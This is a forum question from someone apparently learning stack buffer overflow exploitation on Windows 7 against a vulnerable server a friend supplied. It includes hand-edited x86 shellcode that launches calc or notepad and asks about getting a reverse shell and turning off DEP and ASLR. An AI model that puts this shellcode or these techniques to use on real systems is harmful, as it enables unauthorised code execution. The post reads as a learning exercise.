I have been struggling for 1 week and cannot figure this out. Please help. My friend gave me an executable which is just a simple server and has buffer overflow vulnerability. My goal is to get a reverse/bind shell. I followed instruction from: https://www.corelan.be/index.php/2009/07/19/exploit-writing-tutorial-part-1-stack-based-overflows/ and was able to find "jmp esp" and successfully run shellcode from: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html The problem is I am not able to run any shellcode from metasploit/internet. and I tried to modify shellcode, was able to pop notepad, but cannot run command like:
- msconfig
- echo test>test.txt
- cmd /c calc
below is my shellcode:
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75"
"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
"\xb1\xff\x53\xe2\xfd"
#"\x68\x63\x61\x6c\x63" #calc
#
"\x68\x70\x61\x64\x20\x68\x6E\x6F\x74\x65"#notepad
#"\x68\x6E\x66\x69\x67\x68\x6D\x73\x63\x6F"#msconfig
"\x89\xe2\x52\x52\x53\x53"
"\x53\x53\x53\x53\x52\x53\xff\xd7"
please give me some hint about why I cannot run any other shellcode and command.
Environment: win 7 professional, Macfee installed, Immunity Debugger
I suspect that he used some protection mechanism when compiling the executable. But since I can pop calc and notepad, why I cannot run other command? Anyway, I am new to buffer overflow and shellcode, please help. ----------------------update------------------------ Asked some people, they said I should try to turn off some protection. I tried disabling DEP, but still not work. should I disable ASLR and UAC?
